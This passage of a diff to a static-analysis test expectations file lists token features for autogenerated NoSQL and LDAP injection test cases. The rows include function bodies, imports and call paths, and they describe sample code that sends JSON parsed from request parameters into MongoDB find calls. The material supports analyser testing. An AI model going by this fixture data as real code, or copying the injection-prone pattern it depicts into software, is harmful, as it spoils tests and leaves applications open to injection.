(req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:29:58:41 | validateAsync | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:29:58:41 | validateAsync | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:58:29:58:41 | validateAsync | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:13:59:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:17:59:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:17:59:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:17:59:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:17:59:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:17:59:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | contextFunctionInterfaces | validate(x) | @@ -838,6 +4763,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:59:22:59:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:60:18:60:18 | e | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:60:18:60:18 | e | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:60:18:60:18 | e | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:60:18:60:18 | e | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:60:18:60:18 | e | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:13:61:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:17:61:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:17:61:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:17:61:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:17:61:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:17:61:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | contextFunctionInterfaces | validate(x) | @@ -846,24 +4801,123 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:61:22:61:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:0 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:0 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | require | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | require | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:1:1:1 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:10 | http | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:10 | http | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:10 | http | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http = ... "http") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http = ... "http") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:7:1:28 | http = ... "http") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:20 | require | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:20 | require | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | exceptional return of require("http") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | exceptional return of require("http") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | exceptional return of require("http") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | require("http") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | require("http") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:14:1:28 | require("http") | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | contextFunctionInterfaces | sanitizeInput(input) | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:1:22:1:27 | "http" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:9 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:9 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:9 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:9 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url = require("url") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url = require("url") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:7:2:26 | url = require("url") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:19 | require | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:19 | require | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | exceptional return of require("url") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | exceptional return of require("url") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | exceptional return of require("url") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | require("url") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | require("url") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:13:2:26 | require("url") | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | contextFunctionInterfaces | sanitizeInput(input) | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:2:21:2:25 | "url" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:10 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:10 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:10 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:10 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap = ... dapjs") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap = ... dapjs") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:7:3:30 | ldap = ... dapjs") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:20 | require | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:20 | require | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | exceptional return of require("ldapjs") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | exceptional return of require("ldapjs") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | exceptional return of require("ldapjs") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | require("ldapjs") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | require("ldapjs") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:14:3:30 | require("ldapjs") | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | contextFunctionInterfaces | sanitizeInput(input) | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:3:22:3:29 | "ldapjs" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:4:12 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:4:12 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:4:12 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:4:12 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client ... 89",\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client ... 89",\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:7:6:2 | client ... 89",\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:19 | ldap | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:19 | ldap | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:19 | ldap | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:32 | ldap.createClient | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:32 | ldap.createClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:4:32 | ldap.createClient | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | exceptional return of ldap.cr ... 89",\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | exceptional return of ldap.cr ... 89",\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | exceptional return of ldap.cr ... 89",\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | ldap.cr ... 89",\\n}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | ldap.cr ... 89",\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:16:6:2 | ldap.cr ... 89",\\n}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:21:4:32 | createClient | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:21:4:32 | createClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:21:4:32 | createClient | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | CalleeFlexibleAccessPath | ldap.createClient | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | calleeImports | ldapjs | @@ -871,6 +4925,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:4:34:6:1 | {\\n url ... 389",\\n} | receiverName | ldap | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:5 | url | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:5 | url | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:5 | url | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:3:5:30 | url: "l ... 1:1389" | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | CalleeFlexibleAccessPath | ldap.createClient | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | InputAccessPathFromCallee | 0.url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | InputArgumentIndex | 0 | @@ -879,6 +4942,149 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | contextFunctionInterfaces | sanitizeInput(input) | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:5:8:5:30 | "ldap:/ ... 1:1389" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:9:19 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:9:19 | sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:9:19 | sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:9:19 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitiz ... 2f");\\n} | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitiz ... 2f");\\n} | contextSurroundingFunctionParameters | | +| 